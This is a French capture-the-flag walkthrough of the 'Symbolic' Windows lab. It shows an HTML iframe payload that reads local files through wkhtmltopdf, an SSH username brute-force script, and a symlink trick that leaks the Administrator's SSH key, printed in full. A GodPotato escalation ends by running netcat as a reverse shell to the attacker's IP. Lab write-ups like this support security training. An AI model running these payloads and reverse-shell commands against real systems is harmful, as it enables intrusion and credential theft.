Symbolic

WkhtmltoPDF Symbolic link ssh

Nom machine : Symbolic
Difficulté : Intermédiaire
OS : Windows

Enumération

NMAP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-01 09:25 EDT
Nmap scan report for 192.168.209.177
Host is up (0.041s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:40:e2:ef:21:ea:c1:77:b6:14:a3:f7:04:59:45:28 (RSA)
|   256 f8:fb:e3:c6:16:3a:e2:62:d0:e2:ae:d4:f2:9e:6f:6d (ECDSA)
|_  256 94:5e:97:ad:f9:0f:81:b6:6b:3b:bd:98:43:c0:0d:6a (ED25519)
80/tcp open  http    Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
|_http-title: WebPage to PDF

HTTP (80) : Apache httpd 2.4.48

WkhtmltoPDF

┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.209.177/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.209.177/__24-08-01_09-42-00.txt

Target: http://192.168.209.177/

[09:42:00] Starting: 
[09:42:05] 403 -  304B  - /%3f/
[09:42:05] 403 -  304B  - /%C0%AE%C0%AE%C0%AF
[09:42:05] 403 -  304B  - /%ff
[09:42:06] 403 -  304B  - /.ht_wsr.txt
[09:42:06] 403 -  304B  - /.htaccess.orig
{...}
[09:42:19] 403 -  304B  - /index.php::$DATA
[09:42:21] 301 -  341B  - /logs  ->  http://192.168.209.177/logs/
[09:42:21] 200 -  983B  - /Logs/
[09:42:21] 200 -  983B  - /logs/
[09:42:24] 403 -  423B  - /phpmyadmin
[09:42:25] 403 -  423B  - /phpmyadmin/ChangeLog
[09:42:25] 403 -  423B  - /phpmyadmin/doc/html/index.html
{...}

Task Completed

Nous pouvons accéder au dossier logs.

Nous allons vérifier si le fichier abf668cc40f70bd74ce74e67eb397c27.pdf existe.

Nous devons d'abord connaître le chemin pour accéder au fichier.

Nous avons donc lancer un server python sur notre machine (la machine n'étant pas connectée à internet) puis rentrer http://<notre_ip> dans la barre située au milieu de la page index.html de notre machine cible.

┌──(kali㉿kali)-[~]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.209.177 - - [01/Aug/2024 09:44:37] "GET / HTTP/1.1" 200 -

Le chemin /pdfs/ nous intéresse. Nous pouvons également en profiter pour télécharger le fichier et trouver le numéro de version.

┌──(kali㉿kali)-[~/Downloads]
└─$ exiftool test.pdf
ExifTool Version Number         : 12.76
File Name                       : test.pdf
Directory                       : .
File Size                       : 35 kB
File Modification Date/Time     : 2024:08:01 10:41:06-04:00
File Access Date/Time           : 2024:08:01 10:41:06-04:00
File Inode Change Date/Time     : 2024:08:01 10:41:06-04:00
File Permissions                : -rw-rw-r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Title                           : Directory listing for /
Creator                         : wkhtmltopdf 0.12.3
Producer                        : Qt 4.8.7
Create Date                     : 2024:08:01 07:40:47-07:00
Page Count                      : 1
Page Mode                       : UseOutlines

wkhtmltopdf 0.12.3

Nous allons maintenant revenir au fichier pdf précédemment trouvé grâce au fichier log.

Bingo !

Nous avons donc une clef privée ssh, cependant nous n'avons pas récupéré de nom d'utilisateur.

Nous allons tenter de bruteforce avec hydra.

Accès initial

Bruteforce SSH avec une clef privé

Nous avons utilisé ce code bash :

#!/bin/bash

# Check if the correct number of arguments is passed
if [ "$#" -ne 4 ]; then
    echo "Usage: $0 <target_ip> <port> <key_path> <usernames_file>"
    exit 1
fi

TARGET_IP="$1"      # First argument: target IP address
PORT="$2"           # Second argument: SSH port
KEY="$3"            # Third argument: path to the private key
USERNAMES_FILE="$4" # Fourth argument: file containing usernames

# Check if the usernames file exists
if [ ! -f "$USERNAMES_FILE" ]; then
    echo "Usernames file not found: $USERNAMES_FILE"
    exit 1
fi

# Check if the private key exists
if [ ! -f "$KEY" ]; then
    echo "Key file not found: $KEY"
    exit 1
fi

# Read each username from the file and attempt to connect
while IFS= read -r USERNAME; do
    echo "Testing $USERNAME..."
    ssh -o BatchMode=yes -o StrictHostKeyChecking=no -i "$KEY" "$USERNAME@$TARGET_IP" -p $PORT exit
    if [ $? -eq 0 ]; then
        echo "Success with username: $USERNAME"
        exit 0
    fi
done < "$USERNAMES_FILE"

echo "No valid username found."

┌──(kali㉿kali)-[~]
└─$ chmod 600 id_rsa  

┌──(kali㉿kali)-[~]
└─$ chmod +x bruteforce-ssh.sh                             
                                                                       
┌──(kali㉿kali)-[~]
└─$ ./bruteforce-ssh.sh 192.168.209.177 22 id_rsa user.txt

Pas de résultat.

Après réflexion, le nom d'utilisateur se trouvait sur la page...... "Converter by p4yl0ad "

┌──(kali㉿kali)-[~]
└─$ ssh p4yl0ad@192.168.209.177 -i id_rsa

Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.

p4yl0ad@SYMBOLIC C:\Users\p4yl0ad>

Il y avait un autre moyen de trouver la clef privée.

LFI

Nous avons dans un premier temps tester si une page web fonctionne.

┌──(kali㉿kali)-[~]
└─$ cat payload.html        
<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <title>LFI</title>
</head>
<body>
    <p>Test</p>
</body>
</html>

Cela a fonctionnée, nous avons donc mis dans le body : <iframe src="C:/Windows/system32/drivers/etc/hosts" >

Cela fonctionne mais le texte est affiché dans un espace qu'on ne peut déplacer.

Nous allons donc agrandir cette espace et changer le fichier à lire.

┌──(kali㉿kali)-[~]
└─$ cat payload.html        
<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <title>LFI</title>
</head>
<body>
    <iframe src="C:/users/p4yl0ad/.ssh/id_rsa" height=1000 width=1000 />
</body>
</html>

Elévation des privilèges

Nous avons trouvé un dossier backup à la racine. Le fichier backup.ps1 appartient

PS C:\backup> Get-ChildItem


    Directory: C:\backup


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         8/1/2024   8:45 AM                logs
-a----       10/11/2021   9:11 PM            207 backup.ps1

PS C:\backup> Get-Content backup.ps1
$log = "C:\xampp\htdocs\logs\request.log" 
$backup = "C:\backup\logs"

while($true) {
        # Grabbing Backup
        copy $log $backup\$(get-date -f MM-dd-yyyy_HH_mm_s)
        Start-Sleep -s 60
}

Nous allons voir quel droit nous avons dans le dossier logs. Si nous avons tous les droits, nous pourrions créer un lien symbolique nous permettant de lire le fichier id_rsa de l'administrator.

PS C:\backup> powershell Get-Acl C:\xampp\htdocs\logs


    Directory: C:\xampp\htdocs


Path Owner                  Access
---- -----                  ------
logs BUILTIN\Administrators SYMBOLIC\p4yl0ad Allow  FullControl...

Nous avons tous les droits.

GitHub - googleprojectzero/symboliclink-testing-toolsGitHub

Le binaire qui nous intéresse sur ce github est : CreateSymlink.exe.

En effet, la commande New-Item -ItemType SymbolicLink -Path "C:\xampp\htdocs\logs\request.log" -Target "C:\Users\Administrator\.ssh\id_rsa" ne fonctionne pas.

Nous allons donc le télécharger sur notre victime et l'utiliser pour créer notre lien symbolique. Mais nous devons tout d'abord supprimer le dossiers logs puis le re-créer :

PS C:\backup> del C:\xampp\htdocs\logs
PS C:\xampp\htdocs> New-Item -ItemType Directory -Path="C:\xampp\htdocs\logs"
PS C:\backup> iwr -uri http://192.168.45.185/Tools/CreateSymlink.exe -O
utfile cs.exe
/cs.exe "C:\xampp\htdocs\logs\request.log" "C:\Users\Adm
inistrator\.ssh\id_rsa"
Opened Link \RPC Control\request.log -> \??\C:\Users\Administrator\.ssh
\id_rsa: 00000158
Press ENTER to exit and delete the symlink

Nous pouvons ensuite lire le dernier fichier de /backup/logs :

PS C:\backup\logs> type 08-01-2024_09_46_54
-----BEGIN OPENSSH PRIVATE KEY----- 
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn 
NhAAAAAwEAAQAAAQEAxxA5qirPy3e1f5k4mL/3P1zBuVAgVPk4AZhptq1oyUsnNC4y0E3e 
AVQvcLFty21pVg8Dd4MBhE1SQqrCGN1pIoWcIPGRlvbDOmGaXFk3ow5IYcu5nkw0L6u2ML 
EO3SomD4bP1Z112FBbYA8KAymItR39M2QPKYXAHF1wNxZlWQjhVEmhKZVCLYubgECimTje 
43EZ6NxELnftirOUhTFAecXIqo9FPyUpXh3ltMqR3mupeBLp7cblubMa5sV1P9v4xjxJRj 
WaL0aAb4OjS67bKG2HEoWWY7JHrjUKCzOpQpHvz7u00MroNa31SHu6XDBraREzZeZ+zdse 
fFcZdflKRwAAA9CAteVYgLXlWAAAAAdzc2gtcnNhAAABAQDHEDmqKs/Ld7V/mTiYv/c/XM 
G5UCBU+TgBmGm2rWjJSyc0LjLQTd4BVC9wsW3LbWlWDwN3gwGETVJCqsIY3WkihZwg8ZGW 
9sM6YZpcWTejDkhhy7meTDQvq7YwsQ7dKiYPhs/VnXXYUFtgDwoDKYi1Hf0zZA8phcAcXX 
A3FmVZCOFUSaEplUIti5uAQKKZON7jcRno3EQud+2Ks5SFMUB5xciqj0U/JSleHeW0ypHe 
a6l4EuntxuW5sxrmxXU/2/jGPElGNZovRoBvg6NLrtsobYcShZZjskeuNQoLM6lCke/Pu7 
TQyug1rfVIe7pcMGtpETNl5n7N2x58Vxl1+UpHAAAAAwEAAQAAAQBXP/hWap9baiPGQq04 
3mMLhadvhvw04ms238vuAsG8ANG1IE6rWIXnBTQp68rY8CLMUpZNasFecNmOWPPsHBe5xu 
Aw3FDY312gmCklMwGc2WTGYJoCFRqGjnezjdea/p9iDM/JrFN7tXTnfJAB5NGDuRpCzSeM 
JpCWninSK2HOjLygldNiJCjmFhl5YJ2IU1GjSMDtNUo3VavCcrQ+FxB+L2eG7FHiHo3+Be 
McSGCOLBf1YokbXV88Se9ofnJyi+Ddsg9+v4vQfSZ958m/gSAoqxkg0KtWR45lpMpSN03k 
Hx8mb3jQTJhuT07GRXiZIJ5RVmO0f6wNH6KzACnD7J9ZAAAAgQCvUJUJwYSUvI0rNSXQMz 
tieT0IZq7oFiQISKjfAED0zLWm3s9ML8BZ3ArWomZinsHont1Pr1Q0nXhLB/UEqECMpkDf 
Rnr+MssfPXMh/BHmsIcAzqT0MoG1NIeF3dRWQbo4ZmxDZQ3YJhfrstVzmho9qZWx2ZXyPs 
sA7HCDqBV1CQAAAIEA754ugprmrQCFcR2DqV52ejK1MARGxYlNq980hUplnlV1oE2hrbzs 
AJ2dDHXRnllAAWJDQtJvYlj3w9C7p4bXKnczXXAKwa0MCtyz1h0TGyn63k8L0+BxKXnOET 
NDHrBJ06pBdJpf5TCX0Uz4siCTOibDVol2gZbQkFkDLtV/y/MAAACBANSsQQgd8rBIxsBB 
lZnID93TvwWniL8i7v/IHiuALGMGLqaXTb8FYPNhlOZPQmpE3SzstosCAmf+dypTYa1qm3 
PK16UBRBIkltnlfuRDBKqLWtI5MoPhArWelEyd/xpLAvMcMcsS8bh2TJe8jfo1dC8TcCNm 
va4M+FKZegkfjsFdAAAAFmFkbWluaXN0cmF0b3JAU1lNQk9MSUMBAgME
-----END OPENSSH PRIVATE KEY-----

Nous nous connectons de la même manière que pour le premier utilisateur.

┌──(kali㉿kali)-[~]
└─$ ssh administrator@192.168.209.177 -i id_rsa2

Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.

administrator@SYMBOLIC C:\Users\Administrator>whoami
symbolic\administrator

Nous sommes administrator ! Mais non NT AUTHORITY \ SYSTEM. Nous avons toutefois accès au flag.

PS C:\Users\Administrator\desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description
                                      State
========================================= =============================
===================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a pr
ocess                                 Enabled
{...}
SeDebugPrivilege                          Debug programs
                                      Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment v
alues                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking     
                                      Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote 
system                                Enabled
SeUndockPrivilege                         Remove computer from docking 
station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance ta
sks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after au
thentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects        
                                      Enabled
{...}

SeImpersonatePrivilege

RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato - HackTricksHackTricks

Nous allons utiliser GodPotato. Nous allons donc le télécharger sur la machine cible ainsi que nc.exe.

PS C:\Users\Administrator\desktop> iwr -uri http://192.168.45.185/Tools
/GodPotato.exe -Outfile god.exe
PS C:\Users\Administrator\desktop> iwr -uri http://192.168.45.185/Tools
/nc.exe -Outfile nc.exe
PS C:\Users\Administrator\desktop> ./god.exe -cmd "nc.exe 192.168.45.18
5 1234 -e cmd" 
[*] CombaseModule: 0x140737437106176
[*] DispatchTable: 0x140737439419584
[*] UseProtseqFunction: 0x140737438796848
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\db30d906-e693-4198-ae6c-908584173cab\pipe\
epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00002802-1280-ffff-889d-af6c4d9c5262
[*] DCOM obj OXID: 0xdef68970ad8962b1
[*] DCOM obj OID: 0xba20bb847ae8f52
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 888 Token:0x812  User: NT AUTHORITY\SYSTEM ImpersonationLevel
: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3572

Un listener écoute sur le port 1234, nous sommes NT AUTHORITY \ SYSTEM !

PrécédentSybaris SuivantShenzi

Mis à jour il y a 1 an

hashtagEnumération

hashtagNMAP

hashtagHTTP (80) : Apache httpd 2.4.48

hashtagWkhtmltoPDF

hashtagAccès initial

hashtagBruteforce SSH avec une clef privé

hashtagLFI

hashtagElévation des privilèges